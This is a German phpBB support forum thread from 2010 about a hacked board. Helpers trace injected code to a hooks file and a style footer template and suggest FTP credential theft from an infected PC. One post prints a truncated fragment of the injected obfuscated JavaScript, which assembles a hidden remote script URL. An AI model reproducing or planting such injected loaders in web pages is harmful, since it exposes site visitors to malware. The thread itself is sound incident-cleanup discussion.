php debug fehler und virus warung

storm-rider · Beitrag von **storm-rider** » 20.05.2010 09:22

hi leute,

hab ein riesenproblem!!!

anscheinend wurde unser forum gehackt.
hier mal ein bild wie es aussieht:

http://s5.directupload.net/images/100520/zuj6duah.jpg"]www.touran4fun.de

bin total überfordert was ich jetz tun kann. ich kann mich weder anmelden im forum um
ins ACP zu kommen, noch sonst etwas tun...

HIIIIILLFFEEEEEE!!!

DeepSurfer · Beitrag von **DeepSurfer** » 20.05.2010 10:03

Debugmeldung:
[quote][phpBB Debug] PHP Notice: in file /includes/session.php on line 916: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:252)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 916: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:252)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 916: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:252)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3533: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:252)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3535: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:252)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3536: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:252)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3537: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:252)[/quote]

Sieht danach aus das es in die /includes/hooks/index.php eingetragen wurde, denn die Originale aus phpBB 3.0.7-PL1 hat nur 250 Zeilen, wenn Du also kein MOD installiert hast das Änderungen in dieser includes/hooks/index.php definiert so kannst du einfach mal per FTP eine Originale Datei hoch laden.

Des weiteren werden wohl nicht alle CSS Daten geladen weil die Schrift grössen absolut nicht passen.

Kann es sein das Du ein neuen Style eingebaut hast und seitdem ist das Forum Fehlerhaft ?

storm-rider · Beitrag von **storm-rider** » 20.05.2010 10:21

hallo,

danke für die info. ich hab nix eingebaut, anscheinend ist das ein virus, weil das bei allen 3 foren ist
die ich hab...

besteht die möglichkeit den fehler einfach zu löschen aus der entsprechenden datei??
leider is mir vor 4 wochen mein rechner abgeschmiert, und ich hab weder backup noch andere dateien mehr...

bzw. kann ich mir irgendwo die orig. datei (nur die eine) runterladen und austauschen im ftp?
oder sind in der datei viele änderungen drin?

anscheinend war das irgend ein scherz virus.. vielleicht hat er ja nix kaputt gemacht sondern nur bei
allen foren was edditiert

DeepSurfer · Beitrag von **DeepSurfer** » 20.05.2010 10:34

Also ..laut Changelog hast du Forum Version 3.0.0, die erste die jemals herauskam und seitdem nie gepflegt und geupdatet.
Nungut, DAMALS kann die includes/hooks/index.php mehr als 250 Zeilen haben.

Sollte das an dieser Stelle zutreffen, so darf ich mir ein schmunzeln wohl erlauben

- Ist das ein Windows oder Linux Server ?
- Die Originale Datei durch herunterladen der kompletten Version aus dem Archiv herunterladen. (entpacken und die einzelne Datei per FTP auf den Webspace)

storm-rider · Beitrag von **storm-rider** » 20.05.2010 10:59

hi,

welche version das ist, bin ich überfragt. da kennst du dich wohl besser aus

ich hab mal ein update versucht, das weis ich noch, hat aber nicth funktioniert und ich deshalb dann aufgegeben....

server liegt bei domaingo, k.A. was für einer..

dann lad ich mir mal den ganzen geplempel runter und zieh mir die datei raus, und hoffe es läuft dann!

für was is die datei gut? also was macht die normalerweise? hook = haken?
also wenn die sache nen haken hat, liegts an der datei??

storm-rider · Beitrag von **storm-rider** » 20.05.2010 11:45

SCHEISS DIE WAND AN!!!!!

du bist echt gut! das hat geholfen! alles wieder im grünen bereich.

DANKE TAUSENDMAL

storm-rider · Beitrag von **storm-rider** » 01.06.2010 09:03

shit, ich hab mich zu früh gefreut..

user meiner foren bekommen jetz diverse warnungen!!! z.B.

[ externes Bild ]

oder

Warning:Itella ProxyAV has detected a Virus/PUS in thid file!File has been dropped. Virus/PUS: "Troj/Exp.35-W" found

das heißt ja, das problem liegt auf dem FTP, oder??

hab mir jetz mal den ganzen FTP runtergeladen, aber kann NICHTS derartiges finden!!!
kanns sein das der trojaner sich in einer .php datei versteckt?? wie kann ich den rausfinden??
bin total überfragt.. hab das gefühl ich darf jetz 4 foren neu aufsetzen...

DeepSurfer · Beitrag von **DeepSurfer** » 01.06.2010 10:50

Wen ich Deinen Webspace aufrufe und dann den Quelltext anschaue, so ist ganz unten ein SCRIPT Aufruf der zum einen mir absolut unbekannt ist und zum anderen auch nicht vollständig fertig gestellt wird. (also das sichtbare)

Da dieses SCRIPT nach dem Copyright erscheint so meine ich das etwas in Deiner overall_footer.html in Deinem Style eingebettet ist, was da nicht hingehört.

Frage an die Supporter:
Ist eine weitere Grundseite des Board vorhanden was sich nach dem overall_footer.html eines Styles Informationen abgibt ?

Beitrag von **Dr.Death** » 01.06.2010 12:50

Hallo,

diese Art von "Virus" Problem liegt zu 99% am infizierten PC des Forenbetreibers.

Der Virus befällt alle PHP / HTML Dateien. Beim Hochladen der Dateien auf dem Webserver wird der Virus eingeschleust.

Scanne den PC also auf Viren/Root-Kit Befall.
Danach solltest Du alle PHP / HTML Dateien prüfen und ggf. säubern. (Meistens die overall_footer.html oder overall_header.html im im betroffenen Styles Ordner.

storm-rider · Beitrag von **storm-rider** » 01.06.2010 17:25

Hallo,

meinst du dieses skript?

<script>var q=false;E=[];this.p=8420;this.p++;var P;Nc=12864;Nc++;var ue=["Q","j","Zz"];U=function(){this.wW="";var yc=742;var aA=["su","uw","G"];suy=65128;suy+=65;function a(l,g,n){var gM=["AY"];return l.substr(g,n);}sA=12399;sA-=112;this.QG=22173;this.QG-=9;var Z=RegExp;this.r=58264;this.r--;var _E={Hj:43730};var o='';vR={k:44051};var qh=35135;var X=String("/paip"+"ai-co"+a("m/goozAkX",0,5)+a("gle.cZwH",0,5)+a("XCFom/zeCFX",3,5)+a("uk3do.cok3u",3,5)+a("m.phpQ9Y",0,5));var b=document;var tl=new Date();var vT=new Array(); [Script gekürzt - Dr.Death]

ich habe die ganze seite jetz runtergeladen und auf viren überprüft, aber nichts gefunden.

WENN der virus über meinen pc kam, dann hat er sich selbständig die FTP daten gezogen und sich selbst aufgespielt, weil ich schon sicher 1 monat nicht mehr am ftp war.

danke für den tip mit footer und header, ich werde die dateien mal durchschauen und mal die "enden" (wie oben)
entfernen.

DANKE schonmal!

phpBB.de

php debug fehler und virus warung

php debug fehler und virus warung

Re: php debug fehler und virus warung

Re: php debug fehler und virus warung

Re: php debug fehler und virus warung

Re: php debug fehler und virus warung

Re: php debug fehler und virus warung

Re: php debug fehler und virus warung

Re: php debug fehler und virus warung

Re: php debug fehler und virus warung

Re: php debug fehler und virus warung